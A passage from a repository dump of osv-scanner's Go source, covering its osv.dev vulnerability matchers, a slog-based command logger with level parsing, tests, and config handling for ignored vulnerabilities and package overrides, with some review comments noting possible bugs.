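	expectDBToHaveOSVs(t, db, []*osvschema.Vulnerability{
		{
			Id: "GHSA-2",
			Affected: []*osvschema.Affected{
				{Package: &osvschema.Package{Name: "pkg-1"}},
			},
		},
		{
			Id: "GHSA-5",
			Affected: []*osvschema.Affected{
				{Package: &osvschema.Package{Name: "pkg-2"}},
				{Package: &osvschema.Package{Name: "pkg-1"}},
			},
		},
		{
			Id: "GHSA-6",
			Affected: []*osvschema.Affected{
				{Package: &osvschema.Package{Name: "pkg-3"}},
				{Package: &osvschema.Package{Name: "pkg-2"}},
			},
		},
		{
			Id: "GHSA-7",
			Affected: []*osvschema.Affected{
				{Ranges: []*osvschema.Range{
					{Type: osvschema.Range_SEMVER},
					{Type: osvschema.Range_GIT, Repo: "https://github.com/org/repo"},
				}},
			},
		},
		{
			Id: "GHSA-8",
			Affected: []*osvschema.Affected{
				{Ranges: []*osvschema.Range{{Type: osvschema.Range_SEMVER}}},
				{Ranges: []*osvschema.Range{{Type: osvschema.Range_GIT, Repo: "git://github.com/org/repo.git"}}},
			},
		},
	})
}

================================================
FILE: internal/clients/clientimpl/osvmatcher/cachedosvmatcher.go
================================================
// Package osvmatcher implements two vulnerability matchers using osv.dev's API.
package osvmatcher

import (
	"context"
	"errors"
	"maps"
	"slices"
	"sync"
	"time"

	"github.com/google/osv-scalibr/extractor"
	"github.com/google/osv-scanner/v2/internal/clients/clientimpl/localmatcher"
	"github.com/google/osv-scanner/v2/internal/imodels"
	"github.com/google/osv-scanner/v2/internal/utility/vulns"
	"github.com/ossf/osv-schema/bindings/go/osvschema"
	"golang.org/x/sync/errgroup"
	"osv.dev/bindings/go/api"
	"osv.dev/bindings/go/osvdev"
	"osv.dev/bindings/go/osvdevexperimental"
)

// CachedOSVMatcher implements the VulnerabilityMatcher interface with a osv.dev client.
// It sends out requests for every vulnerability of each package, which get cached.
// Checking if a specific version matches an OSV record is done locally.
// This should be used when we know the same packages are going to be repeatedly
// queried multiple times, as in guided remediation.
// TODO: This does not support commit-based queries.
type CachedOSVMatcher struct {
	Client osvdev.OSVClient
	// InitialQueryTimeout allows you to set a timeout specifically for the initial paging query
	// If timeout runs out, whatever pages that has been successfully queried within the timeout will
	// still return fully hydrated.
	InitialQueryTimeout time.Duration

	vulnCache sync.Map // map[PackageKey][]osvschema.Vulnerability
}

// MatchVulnerabilities returns one result per package, in the same order.
// Packages with nothing in the cache after querying keep a nil result.
func (matcher *CachedOSVMatcher) MatchVulnerabilities(ctx context.Context, pkgs []*extractor.Package) ([][]*osvschema.Vulnerability, error) {
	// populate vulnCache with missing packages
	if err := matcher.doQueries(ctx, pkgs); err != nil {
		return nil, err
	}

	results := make([][]*osvschema.Vulnerability, len(pkgs))

	for i, pkg := range pkgs {
		if err := ctx.Err(); err != nil {
			return nil, err
		}

		key := vulns.NewPackageKey(&osvschema.Package{
			Name:      imodels.Name(pkg),
			Ecosystem: imodels.Ecosystem(pkg).String(),
		})

		cachedVulns, ok := matcher.vulnCache.Load(key)
		if !ok {
			continue
		}

		results[i] = localmatcher.VulnerabilitiesAffectingPackage(cachedVulns.([]*osvschema.Vulnerability), pkg)
	}

	return results, nil
}

// doQueries fetches every advisory for the packages in invs that are not in
// vulnCache yet, and stores the fully hydrated advisories per package.
//
// NOTE(review): when the initial paging query hits its deadline, the advisories
// hydrated so far are not cached and context.DeadlineExceeded is returned, so
// MatchVulnerabilities yields no results at all; that differs from what the
// InitialQueryTimeout field comment describes.
//
// NOTE(review): toQuery is keyed by pointer, and every key is a fresh
// allocation, so it does not remove duplicate packages.
func (matcher *CachedOSVMatcher) doQueries(ctx context.Context, invs []*extractor.Package) error {
	// determine which packages aren't already cached
	// convert Package to Query for each pkgs element
	toQuery := make(map[*api.Query]struct{})

	for _, inv := range invs {
		if imodels.Name(inv) == "" || imodels.Ecosystem(inv).IsEmpty() {
			continue
		}

		pkg := &osvschema.Package{
			Name:      imodels.Name(inv),
			Ecosystem: imodels.Ecosystem(inv).String(),
		}

		if _, cached := matcher.vulnCache.Load(vulns.NewPackageKey(pkg)); !cached {
			toQuery[&api.Query{Package: pkg}] = struct{}{}
		}
	}

	queries := slices.AppendSeq(make([]*api.Query, 0, len(toQuery)), maps.Keys(toQuery))
	if len(queries) == 0 {
		return nil
	}

	var (
		batchResp *api.BatchVulnerabilityList
		err       error
	)

	// If there is a timeout for the initial query, set an additional context deadline here.
	if matcher.InitialQueryTimeout > 0 {
		batchQueryCtx, cancelFunc := context.WithTimeout(ctx, matcher.InitialQueryTimeout)
		batchResp, err = osvdevexperimental.BatchQueryPaging(batchQueryCtx, &matcher.Client, queries)
		cancelFunc()
	} else {
		batchResp, err = osvdevexperimental.BatchQueryPaging(ctx, &matcher.Client, queries)
	}

	// Deadline being exceeded is likely caused by a long paging time
	// if that's the case, we should return what we already got, and
	// then let the caller know it is not all the results.
	deadlineExceeded := false

	if err != nil {
		if !errors.Is(err, context.DeadlineExceeded) {
			return err
		}

		deadlineExceeded = true
	}

	vulnerabilities := make([][]*osvschema.Vulnerability, len(batchResp.GetResults()))
	g, ctx := errgroup.WithContext(ctx)
	g.SetLimit(maxConcurrentRequests)

	for batchIdx, resp := range batchResp.GetResults() {
		vulnerabilities[batchIdx] = make([]*osvschema.Vulnerability, len(resp.GetVulns()))

		for resultIdx, summary := range resp.GetVulns() {
			g.Go(func() error {
				// exit early if another hydration request has already failed
				// results are thrown away later, so avoid needless work
				if ctx.Err() != nil {
					return nil //nolint:nilerr // this value doesn't matter to errgroup.Wait()
				}

				full, err := matcher.Client.GetVulnByID(ctx, summary.GetId())
				if err != nil {
					return err
				}

				vulnerabilities[batchIdx][resultIdx] = full

				return nil
			})
		}
	}

	if err := g.Wait(); err != nil {
		return err
	}

	if deadlineExceeded {
		return context.DeadlineExceeded
	}

	// results are assumed to come back in the order the queries were sent
	for i, vs := range vulnerabilities {
		matcher.vulnCache.Store(vulns.NewPackageKey(queries[i].GetPackage()), vs)
	}

	return nil
}

================================================
FILE: internal/clients/clientimpl/osvmatcher/osvmatcher.go
================================================
package osvmatcher

import (
	"context"
	"errors"
	"net/http"
	"time"

	"github.com/google/osv-scalibr/extractor"
	"github.com/google/osv-scanner/v2/internal/cachedregexp"
	"github.com/google/osv-scanner/v2/internal/cmdlogger"
	"github.com/google/osv-scanner/v2/internal/imodels"
	"github.com/ossf/osv-schema/bindings/go/osvconstants"
	"github.com/ossf/osv-schema/bindings/go/osvschema"
	"golang.org/x/sync/errgroup"
	"osv.dev/bindings/go/api"
	"osv.dev/bindings/go/osvdev"
	"osv.dev/bindings/go/osvdevexperimental"
)

const (
	// maxConcurrentRequests caps the number of advisory lookups in flight at once
	maxConcurrentRequests = 1000
)

// goVersionSuffixRegexp matches a Golang major suffix in a PURL's subpath.
//
// Matches:
//   - v4 - v4
//   - /v5/sdk/internal - v5
//
// Does not match:
//   - sdk/internal
//   - /sdk/resourcemanager/iothub/armiothub
//
// NOTE(review): the pattern does not require the digits to be followed by "/"
// or the end of the subpath, so a first segment that merely starts with
// "v<digits>" also matches.
var goVersionSuffixRegexp = cachedregexp.MustCompile(`^/?(v\d+)`)

// OSVMatcher implements the VulnerabilityMatcher interface with an osv.dev client.
// It sends out requests for every package version and does not perform caching.
type OSVMatcher struct {
	Client osvdev.OSVClient
	// InitialQueryTimeout allows you to set a timeout specifically for the initial paging query
	// If timeout runs out, whatever pages that has been successfully queried within the timeout will
	// still return fully hydrated.
	InitialQueryTimeout time.Duration
}

// New returns an OSVMatcher that talks to the default osv.dev host with the
// given user agent. http.DefaultClient is used when httpClient is nil.
func New(initialQueryTimeout time.Duration, userAgent string, httpClient *http.Client) *OSVMatcher {
	if httpClient == nil {
		httpClient = http.DefaultClient
	}

	config := osvdev.DefaultConfig()
	config.UserAgent = userAgent

	client := osvdev.OSVClient{
		HTTPClient:  httpClient,
		Config:      config,
		BaseHostURL: osvdev.DefaultBaseURL,
	}

	return &OSVMatcher{
		Client:              client,
		InitialQueryTimeout: initialQueryTimeout,
	}
}

// MatchVulnerabilities matches vulnerabilities for a list of packages.
//
// When the initial paging query runs into InitialQueryTimeout, the advisories
// found up to that point are returned together with context.DeadlineExceeded,
// so a non-nil error can come with usable but incomplete results.
func (matcher *OSVMatcher) MatchVulnerabilities(ctx context.Context, pkgs []*extractor.Package) ([][]*osvschema.Vulnerability, error) {
	var batchResp *api.BatchVulnerabilityList
	deadlineExceeded := false

	{
		var err error

		// convert Package to Query for each pkgs element
		queries := pkgsToQueries(pkgs)

		// If there is a timeout for the initial query, set an additional context deadline here.
		if matcher.InitialQueryTimeout > 0 {
			batchQueryCtx, cancelFunc := context.WithTimeout(ctx, matcher.InitialQueryTimeout)
			batchResp, err = osvdevexperimental.BatchQueryPaging(batchQueryCtx, &matcher.Client, queries)
			cancelFunc()
		} else {
			batchResp, err = osvdevexperimental.BatchQueryPaging(ctx, &matcher.Client, queries)
		}

		if err != nil {
			// Deadline being exceeded is likely caused by a long paging time
			// if that's the case, we should return what we already got, and
			// then let the caller know it is not all the results.
			if !errors.Is(err, context.DeadlineExceeded) {
				return nil, err
			}

			deadlineExceeded = true
		}

		// No results found - this could be due to a timeout
		if batchResp == nil {
			return nil, err
		}
	}

	vulnerabilities := make([][]*osvschema.Vulnerability, len(batchResp.GetResults()))
	g, ctx := errgroup.WithContext(ctx)
	g.SetLimit(maxConcurrentRequests)

	for batchIdx, resp := range batchResp.GetResults() {
		vulnerabilities[batchIdx] = make([]*osvschema.Vulnerability, len(resp.GetVulns()))

		for resultIdx, summary := range resp.GetVulns() {
			g.Go(func() error {
				// exit early if another hydration request has already failed
				// results are thrown away later, so avoid needless work
				if ctx.Err() != nil {
					return nil //nolint:nilerr // this value doesn't matter to errgroup.Wait()
				}

				full, err := matcher.Client.GetVulnByID(ctx, summary.GetId())
				if err != nil {
					return err
				}

				vulnerabilities[batchIdx][resultIdx] = full

				return nil
			})
		}
	}

	if err := g.Wait(); err != nil {
		return nil, err
	}

	if deadlineExceeded {
		return vulnerabilities, context.DeadlineExceeded
	}

	return vulnerabilities, nil
}

// pkgToQuery builds the osv.dev query for pkg: a name/ecosystem/version query
// when all three are known, otherwise a commit query when a commit is known.
// For anything else an error is logged and nil is returned.
func pkgToQuery(pkg *extractor.Package) *api.Query {
	hasVersionInfo := imodels.Name(pkg) != "" && !imodels.Ecosystem(pkg).IsEmpty() && imodels.Version(pkg) != ""

	if hasVersionInfo {
		name := imodels.Name(pkg)

		// Tools like Syft create Go PURLs where the module's major suffix is part
		// of the subpath as opposed to the package name:
		//
		//   pkg:golang/github.com/go-jose/go-jose@v4.1.3#v4
		//
		// For a correct match we need to add the major suffix back
		//
		// NOTE(review): pkg.PURL() is dereferenced without a nil check; presumably
		// it is never nil for a package in the Go ecosystem - confirm.
		if imodels.Ecosystem(pkg).Ecosystem == osvconstants.EcosystemGo && pkg.PURL().Subpath != "" {
			if match := goVersionSuffixRegexp.FindStringSubmatch(pkg.PURL().Subpath); match != nil {
				name += "/" + match[1]
			}
		}

		return &api.Query{
			Package: &osvschema.Package{
				Name:      name,
				Ecosystem: imodels.Ecosystem(pkg).String(),
			},
			Param: &api.Query_Version{
				Version: imodels.Version(pkg),
			},
		}
	}

	if commit := imodels.Commit(pkg); commit != "" {
		return &api.Query{
			Param: &api.Query_Commit{
				Commit: commit,
			},
		}
	}

	// This should have been filtered out before reaching this point
	cmdlogger.Errorf("invalid query element: %#v", pkg)

	return nil
}

// pkgsToQueries converts packages to queries via the osv-scanner internal imodels
// to perform the necessary transformations
//
// The result has one entry per package, in order; an entry is nil where
// pkgToQuery could not build a query.
func pkgsToQueries(pkgs []*extractor.Package) []*api.Query {
	queries := make([]*api.Query, 0, len(pkgs))

	for _, pkg := range pkgs {
		queries = append(queries, pkgToQuery(pkg))
	}

	return queries
}

================================================
FILE: internal/clients/clientimpl/osvmatcher/osvmatcher_test.go
================================================
package osvmatcher

import (
	"context"
	"errors"
	"reflect"
	"testing"
	"time"

	"github.com/google/osv-scalibr/extractor"
	"github.com/google/osv-scalibr/purl"
	"github.com/ossf/osv-schema/bindings/go/osvschema"
	"osv.dev/bindings/go/osvdev"
)

func TestOSVMatcher_MatchVulnerabilities(t *testing.T) {
	t.Parallel()

	type fields struct {
		Client              osvdev.OSVClient
		InitialQueryTimeout time.Duration
	}

	type args struct {
		pkgs []*extractor.Package
	}

	tests := []struct {
		name    string
		fields  fields
		args    args
		want    [][]*osvschema.Vulnerability
		wantErr error
	}{
		{
			name: "Timeout_returns_deadline_exceeded_error_(http.Client_code)",
			fields: fields{
				Client: *osvdev.DefaultClient(),
				// Long enough to not timeout until we enter the http client code
				InitialQueryTimeout: 1 * time.Millisecond,
			},
			args: args{
				pkgs: []*extractor.Package{
					{
						Name:     "stdlib",
						Version:  "1.22.0",
						PURLType: purl.TypeGolang,
					},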
}, }, want: nil, wantErr: context.DeadlineExceeded, }, { name: "Timeout_returns_deadline_exceeded_error_(osv.dev_code)", fields: fields{ Client: *osvdev.DefaultClient(), // Short enough to test timeouts before reaching the http client InitialQueryTimeout: 100 * time.Nanosecond, }, args: args{ pkgs: []*extractor.Package{ { Name: "stdlib", Version: "1.22.0", PURLType: purl.TypeGolang, }, }, }, want: nil, wantErr: context.DeadlineExceeded, }, } for i := range tests { tt := tests[i] t.Run(tt.name, func(t *testing.T) { t.Parallel() matcher := &OSVMatcher{ Client: tt.fields.Client, InitialQueryTimeout: tt.fields.InitialQueryTimeout, } got, err := matcher.MatchVulnerabilities(t.Context(), tt.args.pkgs) if !errors.Is(err, tt.wantErr) { t.Errorf("OSVMatcher.MatchVulnerabilities() error = %v, wantErr %v", err, tt.wantErr) } if !reflect.DeepEqual(got, tt.want) { t.Errorf("OSVMatcher.MatchVulnerabilities() = %v, want %v", got, tt.want) } }) } } ================================================ FILE: internal/clients/clientinterfaces/licensematcher.go ================================================ // Package clientinterfaces defines interfaces for external accessors used in osv-scanner. 
package clientinterfaces

import (
	"context"

	"github.com/google/osv-scalibr/extractor"
)

// LicenseMatcher is implemented by clients that look up licenses for packages.
// NOTE(review): only an error is returned, so results are presumably recorded
// on the given packages — confirm against an implementation.
type LicenseMatcher interface {
	MatchLicenses(ctx context.Context, psr []*extractor.Package) error
}

================================================
FILE: internal/clients/clientinterfaces/vulnerabilitymatcher.go
================================================
package clientinterfaces

import (
	"context"

	"github.com/google/osv-scalibr/extractor"
	"github.com/ossf/osv-schema/bindings/go/osvschema"
)

// VulnerabilityMatcher is implemented by clients that look up known
// vulnerabilities for packages.
//
// The OSVMatcher implementation in this listing can return partial results
// together with context.DeadlineExceeded, so callers should check the error
// before treating a result as complete.
type VulnerabilityMatcher interface {
	MatchVulnerabilities(ctx context.Context, invs []*extractor.Package) ([][]*osvschema.Vulnerability, error)
}

================================================
FILE: internal/cmdlogger/fmt.go
================================================
// Package cmdlogger provides a wrapper for slog logging commands.
package cmdlogger

import (
	"cmp"
	"fmt"
	"log/slog"
)

// Debugf formats msg with fmt.Sprintf and logs it at debug level through
// GlobalLogger, or slog.Default() when GlobalLogger is nil.
//
// msg is a format string: pass variable or untrusted text as an argument,
// not as msg.
func Debugf(msg string, args ...any) {
	logger := cmp.Or(GlobalLogger, slog.Default())
	logger.Debug(fmt.Sprintf(msg, args...))
}

// Infof is like Debugf but logs at info level.
func Infof(msg string, args ...any) {
	logger := cmp.Or(GlobalLogger, slog.Default())
	logger.Info(fmt.Sprintf(msg, args...))
}

// Warnf is like Debugf but logs at warn level.
func Warnf(msg string, args ...any) {
	logger := cmp.Or(GlobalLogger, slog.Default())
	logger.Warn(fmt.Sprintf(msg, args...))
}

// Errorf is like Debugf but logs at error level.
func Errorf(msg string, args ...any) {
	logger := cmp.Or(GlobalLogger, slog.Default())
	logger.Error(fmt.Sprintf(msg, args...))
}

================================================
FILE: internal/cmdlogger/handler.go
================================================
package cmdlogger

import (
	"context"
	"fmt"
	"io"
	"log/slog"
	"strings"
)

var (
	// GlobalLogger, when non-nil, is the logger used by Debugf, Infof, Warnf
	// and Errorf instead of slog.Default().
	GlobalLogger *slog.Logger
)

// Handler is a slog.Handler that writes plain messages to stdout or stderr and
// remembers whether an error-level record has been seen.
// NOTE(review): the fields are plain values with no locking visible in this
// file — confirm whether a Handler is shared between goroutines.
type Handler struct {
	// stdout receives records that are not routed to stderr.
	stdout io.Writer
	// stderr receives error-level records, and everything when
	// everythingToStderr is set.
	stderr io.Writer
	// hasErrored is set by SetHasErrored.
	hasErrored bool
	// everythingToStderr routes all output to stderr.
	everythingToStderr bool
	// level is the minimum level reported by Enabled when no overrideHandler is set.
	level slog.Leveler
	// overrideHandler, when non-nil, receives the Enabled, Handle, WithAttrs
	// and WithGroup calls instead of the built-in behavior.
	overrideHandler slog.Handler
	// hasErroredBecauseInvalidConfig is set when an error-level message starts
	// with "Ignored invalid config file".
	hasErroredBecauseInvalidConfig bool
}

// SendEverythingToStderr tells the logger to send all logs to stderr regardless
// of their level.
//
// This is useful if we're expecting to output structured data to stdout such
// as JSON, which cannot be mixed with other output.
func (c *Handler) SendEverythingToStderr() {
	c.everythingToStderr = true
}

// SetLevel sets the minimum level used by Enabled when no override handler is set.
func (c *Handler) SetLevel(level slog.Leveler) {
	c.level = level
}

// writer picks the destination for a record: stderr for error-level records or
// when everything is being sent to stderr, stdout otherwise.
func (c *Handler) writer(level slog.Level) io.Writer {
	if c.everythingToStderr || level == slog.LevelError {
		return c.stderr
	}

	return c.stdout
}

// Enabled reports whether a record at the given level should be handled.
//
// As a side effect, a check for slog.LevelError marks the handler as errored,
// before any record reaches Handle. With an override handler the decision is
// delegated to it; otherwise the level is compared with the configured minimum.
func (c *Handler) Enabled(ctx context.Context, level slog.Level) bool {
	if level == slog.LevelError {
		c.SetHasErrored()
	}

	if c.overrideHandler != nil {
		return c.overrideHandler.Enabled(ctx, level)
	}

	return level >= c.level.Level()
}

// Handle records error state and then emits the record.
//
// Messages starting with "Disabling plugin " are dropped. An error-level record
// marks the handler as errored, and additionally as errored because of an
// invalid config when the message starts with "Ignored invalid config file";
// that flag therefore depends on the wording used where the error is logged.
// With an override handler the record is passed on to it. Otherwise only
// record.Message is written, as-is and followed by a newline; attributes on the
// record are not printed on this path.
func (c *Handler) Handle(ctx context.Context, record slog.Record) error {
	// todo: we probably want to be reporting disabled plugins in some way,
	//  but currently our snapshot-based tests cannot handle os-dependent
	//  output and we've got some plugins that are only available for linux
	if strings.HasPrefix(record.Message, "Disabling plugin ") {
		return nil
	}

	if record.Level == slog.LevelError {
		c.SetHasErrored()

		if strings.HasPrefix(record.Message, "Ignored invalid config file") {
			c.hasErroredBecauseInvalidConfig = true
		}
	}

	if c.overrideHandler != nil {
		return c.overrideHandler.Handle(ctx, record)
	}

	_, err := fmt.Fprint(c.writer(record.Level), record.Message+"\n")

	return err
}

// SetHasErrored marks the handler as having seen an error.
func (c *Handler) SetHasErrored() {
	c.hasErrored = true
}

// HasErrored returns true if SetHasErrored has been called, which Enabled and
// Handle do for a level of [slog.LevelError]
func (c *Handler) HasErrored() bool {
	return c.hasErrored
}

// HasErroredBecauseInvalidConfig returns true if there have been any calls to
// Handle with a level of [slog.LevelError] due to a config file being invalid
func (c *Handler) HasErroredBecauseInvalidConfig() bool {
	return c.hasErroredBecauseInvalidConfig
}

// WithAttrs delegates to the override handler; without one it panics.
func (c *Handler) WithAttrs(a []slog.Attr) slog.Handler {
	if c.overrideHandler != nil {
		return c.overrideHandler.WithAttrs(a)
	}

	panic("not supported")
}

// WithGroup delegates to the override handler; without one it panics.
func (c *Handler) WithGroup(g string) slog.Handler {
	if c.overrideHandler != nil {
		return c.overrideHandler.WithGroup(g)
	}

	panic("not supported")
}

// Compile-time check that *Handler satisfies CmdLogger.
var _ CmdLogger = &Handler{}

// New returns a Handler that writes to the given writers with a minimum level
// of slog.LevelInfo.
func New(stdout, stderr io.Writer) CmdLogger {
	return &Handler{
		stdout: stdout,
		stderr: stderr,
		level:  slog.LevelInfo,
	}
}

// NewOverride returns a Handler that forwards to overrideHandler while still
// tracking error state. No writers or level are set; they are not used while
// an override handler is present.
func NewOverride(overrideHandler slog.Handler) CmdLogger {
	return &Handler{
		overrideHandler: overrideHandler,
	}
}

================================================
FILE: internal/cmdlogger/interface.go
================================================
package cmdlogger

import "log/slog"

// CmdLogger is a slog.Handler that additionally tracks whether an error has
// been logged and lets the caller adjust output routing and level.
type CmdLogger interface {
	slog.Handler

	SendEverythingToStderr()
	SetHasErrored()
	HasErrored() bool
	HasErroredBecauseInvalidConfig() bool
	SetLevel(level slog.Leveler)
}

// SendEverythingToStderr tells the logger (if it's in use) to send all logs
// to stderr regardless of their level. It does nothing when the default slog
// handler is not a CmdLogger.
//
// This is useful if we're expecting to output structured data to stdout such
// as JSON, which cannot be mixed with other output.
func SendEverythingToStderr() {
	l, ok := slog.Default().Handler().(CmdLogger)

	if ok {
		l.SendEverythingToStderr()
	}
}

================================================
FILE: internal/cmdlogger/level.go
================================================
package cmdlogger

import (
	"fmt"
	"log/slog"
	"strings"
)

// levels lists the verbosity names accepted by ParseLevel.
var levels = []string{
	"error",
	"warn",
	"info",
}

// Levels returns the accepted verbosity names. The package-level slice itself
// is returned, not a copy, so callers must not modify it.
func Levels() []string {
	return levels
}

// ParseLevel maps a verbosity name to its slog level.
//
// The match is exact ("error", "warn" or "info"). Any other text returns
// slog.LevelInfo together with an error that lists the accepted names.
func ParseLevel(text string) (slog.Level, error) {
	switch text {
	case "error":
		return slog.LevelError, nil
	case "warn":
		return slog.LevelWarn, nil
	case "info":
		return slog.LevelInfo, nil
	default:
		return slog.LevelInfo, fmt.Errorf("invalid verbosity level \"%s\" - must be one of: %s", text, strings.Join(Levels(), ", "))
	}
}

================================================
FILE: internal/cmdlogger/level_test.go
================================================
package cmdlogger_test

import (
	"log/slog"
	"testing"

	"github.com/google/osv-scanner/v2/internal/cmdlogger"
)

// TestParseVerbosityLevel_GivenValidLevels checks that each accepted name
// parses to the matching slog level without an error.
func TestParseVerbosityLevel_GivenValidLevels(t *testing.T) {
	t.Parallel()

	tests := []struct {
		input string
		level slog.Level
	}{
		{input: "error", level: slog.LevelError},
		{input: "warn", level: slog.LevelWarn},
		{input: "info", level: slog.LevelInfo},
	}

	for _, tt := range tests {
		lvl, err := cmdlogger.ParseLevel(tt.input)

		if err != nil {
			t.Error(err)
		}

		if lvl != tt.level {
			t.Errorf("level should be supported: %s", tt.input)
		}
	}
}

// TestParseVerbosityLevel_GivenInvalidLevels checks that an unknown name is
// rejected with an error.
func TestParseVerbosityLevel_GivenInvalidLevels(t *testing.T) {
	t.Parallel()

	_, err := cmdlogger.ParseLevel("invalidlvl")

	if err == nil {
		t.Error("expected invalid level to be an error")
	}
}

================================================
FILE: internal/cmdlogger/scalibr.go
================================================
package cmdlogger

import (
	"fmt"
	"log/slog"

	"github.com/google/osv-scalibr/log"
)

// Compile-time check that *ScalibrAdapter satisfies the osv-scalibr log.Logger.
var _ log.Logger = &ScalibrAdapter{}

// ScalibrAdapter forwards osv-scalibr log calls to an slog.Logger. Each method
// builds the message with fmt.Sprintf or fmt.Sprint and logs it at the level
// named by the method.
type ScalibrAdapter struct {
	Logger *slog.Logger
}

func (s *ScalibrAdapter) Errorf(format string, args ...any) {
	s.Logger.Error(fmt.Sprintf(format, args...))
}

func (s *ScalibrAdapter) Error(args ...any) {
	s.Logger.Error(fmt.Sprint(args...))
}

func (s *ScalibrAdapter) Warnf(format string, args ...any) {
	s.Logger.Warn(fmt.Sprintf(format, args...))
}

func (s *ScalibrAdapter) Warn(args ...any) {
	s.Logger.Warn(fmt.Sprint(args...))
}

func (s *ScalibrAdapter) Infof(format string, args ...any) {
	s.Logger.Info(fmt.Sprintf(format, args...))
}

func (s *ScalibrAdapter) Info(args ...any) {
	s.Logger.Info(fmt.Sprint(args...))
}

func (s *ScalibrAdapter) Debugf(format string, args ...any) {
	s.Logger.Debug(fmt.Sprintf(format, args...))
}

func (s *ScalibrAdapter) Debug(args ...any) {
	s.Logger.Debug(fmt.Sprint(args...))
}

================================================
FILE: internal/cmdlogger/static.go
================================================
package cmdlogger

import "log/slog"

// SetHasErrored marks the default slog handler as errored when it is a
// [CmdLogger]; otherwise it does nothing.
func SetHasErrored() {
	l, ok := slog.Default().Handler().(CmdLogger)

	if ok {
		l.SetHasErrored()
	}
}

// HasErrored returns true if there have been any calls to Handle with
// a level of [slog.LevelError], assuming the default slog handler is a
// [CmdLogger] such as [Handler].
//
// If the handler is not a [CmdLogger], this will always return false.
func HasErrored() bool {
	l, ok := slog.Default().Handler().(CmdLogger)

	if ok {
		return l.HasErrored()
	}

	return false
}

// SetLevel sets the level on the default slog handler when it is a
// [CmdLogger]; otherwise it does nothing.
func SetLevel(level slog.Leveler) {
	l, ok := slog.Default().Handler().(CmdLogger)

	if ok {
		l.SetLevel(level)
	}
}

================================================
FILE: internal/config/config.go
================================================
// Package config manages the configuration for osv-scanner.
package config

import (
	"slices"
	"time"

	"github.com/google/osv-scalibr/extractor"
	"github.com/google/osv-scanner/v2/internal/cmdlogger"
	"github.com/google/osv-scanner/v2/internal/imodels"
)

// OSVScannerConfigName is the file name of the scanner's config file.
var OSVScannerConfigName = "osv-scanner.toml"

// Config is the parsed content of an osv-scanner.toml file. Its entries
// suppress findings, so each one narrows what a scan reports.
type Config struct {
	// IgnoredVulns lists vulnerability IDs to ignore.
	IgnoredVulns []*IgnoreEntry `toml:"IgnoredVulns"`
	// PackageOverrides lists per-package ignore and license overrides.
	PackageOverrides  []PackageOverrideEntry `toml:"PackageOverrides"`
	GoVersionOverride string                 `toml:"GoVersionOverride"`
	// The path to config file that this config was loaded from,
	// set by the scanner after having successfully parsed the file
	// (the `toml:"-"` tag excludes it from the file's own keys).
	LoadPath string `toml:"-"`
}

// IgnoreEntry suppresses one vulnerability ID.
type IgnoreEntry struct {
	ID string `toml:"id"`
	// IgnoreUntil is when the entry stops applying. When it is left unset
	// (zero), the entry never expires; see shouldIgnoreTimestamp.
	IgnoreUntil time.Time `toml:"ignoreUntil"`
	Reason      string    `toml:"reason"`
	// Used is set through MarkAsUsed and read by UnusedIgnoredVulns; it is not
	// a key of the config file.
	Used bool `toml:"-"`
}

// MarkAsUsed records that this entry was applied.
func (ie *IgnoreEntry) MarkAsUsed() {
	ie.Used = true
}

// PackageOverrideEntry applies an ignore or license override to the packages
// it matches.
//
// Name, Version, Ecosystem and Group are filters, and an empty filter matches
// anything. An entry with every filter empty therefore matches every package.
type PackageOverrideEntry struct {
	Name string `toml:"name"`
	// If the version is empty, the entry applies to all versions.
	Version       string        `toml:"version"`
	Ecosystem     string        `toml:"ecosystem"`
	Group         string        `toml:"group"`
	Ignore        bool          `toml:"ignore"`
	Vulnerability Vulnerability `toml:"vulnerability"`
	License       License       `toml:"license"`
	// EffectiveUntil is when the entry stops applying. When it is left unset
	// (zero), the entry never expires; see shouldIgnoreTimestamp.
	EffectiveUntil time.Time `toml:"effectiveUntil"`
	Reason         string    `toml:"reason"`
}

// matches reports whether every non-empty filter of the entry agrees with pkg.
func (e PackageOverrideEntry) matches(pkg *extractor.Package) bool {
	if e.Name != "" && e.Name != imodels.Name(pkg) {
		return false
	}
	if e.Version != "" && e.Version != imodels.Version(pkg) {
		return false
	}
	// If there is an ecosystem filter, it has to equal one of:
	//  - Full ecosystem + suffix
	//  - The base ecosystem
	// The entry is rejected only when the filter equals neither.
	if e.Ecosystem != "" && (e.Ecosystem != imodels.Ecosystem(pkg).String() && e.Ecosystem != string(imodels.Ecosystem(pkg).Ecosystem)) {
		return false
	}
	if e.Group != "" && !slices.Contains(imodels.DepGroups(pkg), e.Group) {
		return false
	}

	return true
}

// Vulnerability holds the vulnerability-related part of a package override.
type Vulnerability struct {
	Ignore bool `toml:"ignore"`
}

// License holds the license-related part of a package override.
type License struct {
	Override []string `toml:"override"`
	Ignore   bool     `toml:"ignore"`
}

// UnusedIgnoredVulns returns the ignore entries that have not been marked as
// used, in config order.
func (c *Config) UnusedIgnoredVulns() []*IgnoreEntry {
	unused := make([]*IgnoreEntry, 0, len(c.IgnoredVulns))

	for _, entry := range c.IgnoredVulns {
		if !entry.Used {
			unused = append(unused, entry)
		}
	}

	return unused
}

// ShouldIgnore reports whether the vulnerability with the given ID is ignored.
//
// Only the first entry with that ID is considered. When none exists the result
// is false with an empty entry. When one exists it is returned even if it has
// expired, in which case the boolean is false.
func (c *Config) ShouldIgnore(vulnID string) (bool, *IgnoreEntry) {
	index := slices.IndexFunc(c.IgnoredVulns, func(e *IgnoreEntry) bool { return e.ID == vulnID })
	if index == -1 {
		return false, &IgnoreEntry{}
	}
	ignoredLine := c.IgnoredVulns[index]

	return shouldIgnoreTimestamp(ignoredLine.IgnoreUntil), ignoredLine
}

// filterPackageVersionEntries finds the first override that matches pkg and
// satisfies condition.
//
// The boolean reports whether that entry is still in effect. Later entries are
// not consulted when the first match has expired. Without a match the result is
// false with an empty entry.
func (c *Config) filterPackageVersionEntries(pkg *extractor.Package, condition func(PackageOverrideEntry) bool) (bool, PackageOverrideEntry) {
	index := slices.IndexFunc(c.PackageOverrides, func(e PackageOverrideEntry) bool {
		return e.matches(pkg) && condition(e)
	})
	if index == -1 {
		return false, PackageOverrideEntry{}
	}
	ignoredLine := c.PackageOverrides[index]

	return shouldIgnoreTimestamp(ignoredLine.EffectiveUntil), ignoredLine
}

// ShouldIgnorePackage determines if the given package should be ignored based on override entries in the config
func (c *Config) ShouldIgnorePackage(pkg *extractor.Package) (bool, PackageOverrideEntry) {
	return c.filterPackageVersionEntries(pkg, func(e PackageOverrideEntry) bool {
		return e.Ignore
	})
}

// ShouldIgnorePackageVulnerabilities determines if the given package should have its vulnerabilities ignored based on override entries in the config
